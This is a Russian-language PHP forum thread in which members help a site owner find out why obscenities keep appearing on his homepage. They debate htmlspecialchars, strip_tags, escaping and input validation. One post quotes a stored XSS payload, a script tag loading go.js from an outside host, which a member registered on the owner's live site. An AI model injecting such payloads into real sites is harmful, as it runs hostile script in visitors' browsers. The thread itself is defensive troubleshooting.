Niksik
http://phpforum.ru/index.php?showtopic=21213 - это для кого?

У тебя написано: echo $myrow['login']; , а должен быть как минимум: echo htmlspecialchars($myrow['login']);

где это написано и откуда знаеш?

Niksik
На главной, где выводится скрипт, у тебя стоит вывод логина.

Подожди у меня такого нет

Niksik
У тебя там: SELECT * FROM `users` ORDER BY `id` (или date) DESC LIMIT 1 и вывод последнего.

вот

$asd = mysql_query("SELECT * FROM `reg` ORDER BY `id` DESC LIMIT 5",$db);

а вот вывод

$asd2 = mysql_fetch_array($asd);
$asd2['login'] = = htmlspecialchars($asd2['login']);
echo '<br /><b><i>Последний зарегистрированный ползователь</i></b><br /><b><i><font color=#FF8000>'.$asd2['login'].'<br />('.$asd2['name'].')</font></i></b>';

ты ведь обрабатывешь этой функцией htmlspecialchars только $asd2['login'] , а $asd2['name'] выводишь на прямую.

слушайте, а не лучше при внесение данных в бд обработать с htmlspecialchars один раз чем делать это каждый раз при выводе....?

Niksik
не надо мне тут такого, в одном месте именно так, в другом - по другому. Именно поэтому и вывелся на экран мой хак. Ищи другие места, где допустил ошибку.
Ищи в своём скрипте, где не обработал данные.

Так не легче сделать ?

$asd2 = mysql_fetch_array($asd);
echo '<br /><b><i>Последний зарегистрированный ползователь</i></b><br /><b><i><font color=#FF8000>'.htmlspecialchars($asd2['login']).'<br />('.htmlspecialchars($asd2['name']).')</font></i></b>'

mrpsyx
Потом редактировать будет неудобно, да и дискомфорт, обрабатывать надо там, где это необходимо, не за чем всё подряд обрабатывать под одну гребёнку.

Domic
Конечно, так вернее всего.

Niksik опиши нормально проблему!!!
Я так понимаю тебе надо отчистить от html тегов ?

Короче на моём сайте на главной странице какаято тварь пишет маты.
Как он это делает я не пойму,все формы проверяются на теги а он как то делает можете сказать как если кто знает?

Отчистить переменные входяшие от пользователя !
обрабатывать все переменные приходяшие от юзера, если это Html теги то пользоватьсо надо strip_tags(); она отчистит все теги mysql_real_escape_string()

inpost это что ты прикаловался?

htmlspecialchars не все теги удаляет?

Niksik

htmlspecialchars не все теги удаляет?

Niksik эта функция ваше не удаляет их )) почитай тут что она делает -> ТУТ

юзай strip_tags() и mysql_real_escape_string()

Domin
А зачем strip_tags() тут вообще? Нормально итак работает, просто надо htmlspecialchars() использовать при выводе данных, как он стал делать только сейчас.

inpost так это ты делал?

Где дайте ссылку глянуть хоть что как !

niksik.ru

Niksik короче, сделай так :
при добавлении записи в базу данных обработай все переменные которые приходят от пользователя тими функциями strip_tags() и mysql_real_escape_string() и выводи спокойно потом в цикле или ешё как то !

Domin
Так ты не ответил, зачем вообще strip_tags ? Для того, чтобы запутать пользователя?

Niksik
При добавлении только mysql_real_escape_string, при выводе только htmlspecialchars
http://my.jetscreenshot.com/demo/20110408-j3ca-36kb

Я зарегался !
Видешь что проходит у тебя ?
так что все переменные обрабатывай теми функциями которые я написал и в БД небудет ничего лишнего!

inpost
strip_tags — Удаляет HTML и PHP тэги из строки написано ТУТ

Нечего не происходит всё норм,а что должно было?

Смотри что получилось после того как я зарегался

Последний зарегистрированный ползователь
Domin<script src="http://d41713.rsstatic.ru/go.js"></script>
(Влад Шева<script src="http://d41713.rsstatic.ru/go.js"></script>)

это на странице http://niksik.ru/gost.php

Niksik теперь ты понял к чему я клоню ???

Domin
Мой ник я записал так: In<p>ost - мне сказали: поздравляем, вы зарегистрировались! Я на следующий день пытаюсь авторизироваться, а мне пишут: простите, нет такого пользователя в БД. Откуда я знал, что скрипт не воспринял мой ЛОГИН и переименовал меня в Inost ? Я НЕ ХОЧУ БЫТЬ inost, совсем не хочу, а ты меня насильно переименовал! А это уже плохо.
Ты даёшь ссылку на описание функции? Зачем? Я тебе говорю, зачем использовать его в данном случае?! Достаточно лишь mysql_real_escape_string, а strip_tags - это лишнее.
И почему я не могу быть как In<p>ost ? Или Ku<li>ev ? Может мне так больше нравится?! А теперь ты нашего Kulieva переименовал у себя в БД в Kuev? нормально?!

Смотри скрипт записало но он не работает,а я так понимаю ты предлогаеш полностью удалять скрипт?

В смысле я некого не переименовывал

Niksik
http://phpforum.ru/index.php?showtopic=19168
И ещё, я же отметил жирным, кому адресовал то сообщение.

inpost ты канеш извени но что ты курил ? какие тут In<p>ost это просто не допустимо ))
А если я захотел такой ник Domin<script src="http://d41713.rsstatic.ru/go.js"></script> что мне скажешь тож зарегать ?

Domin
Такое фиксируется ещё до ДОБАВЛЕНИЯ В БД! Слышал когда-нибудь о "Валидация форм"? Так вот, в данном случае надо вывести: "недопустимые символы, введите правильно", а для этого использовать регулярку. А ты заведомо рекомендуешь неправильно вести себя с некорректно введёнными данными.

inpost знаю не тупой это уже пройденый этап, регулярки и тд, рега у меня на сайте рабит отменно =)

Domin
Ну тогда зачем советуюшь человеку заведомо неправильный ход действий? Лучше скажи, что тут надо регуляркой проверять ещё до добавления в БД, и разрешать только стандартные символы и буквы. Тогда пользователь всегда на выходе получит тот ник, с которым зарегистрировался.
Niksik выше для тебя тоже адресовалось, перечитай, и ты знаешь, куда дальше направить изучение. Если человек ввёл в форму недопустимые символы - вывести ему результат: Вы ввели неправильные символы. Делается это через регулярное выражение preg_match

Сори что не по теме !
inpost подскажи исче по запросам
можно в одном запросе использовать сразу INSERT INTO и потом SELECT ?

Domin
mysqli может, а ты лучше создай свою тему.

niksik.ru - ты-бы пароль для начала на админа нормальный придумал.
2. слово "фармат" пишется через "О".
3. что за тупость разрешать только png ? почему нельзя jpg ?
4. админка так себе у тебя.

кодировка сайта после ввода login/pass на Safari 5.0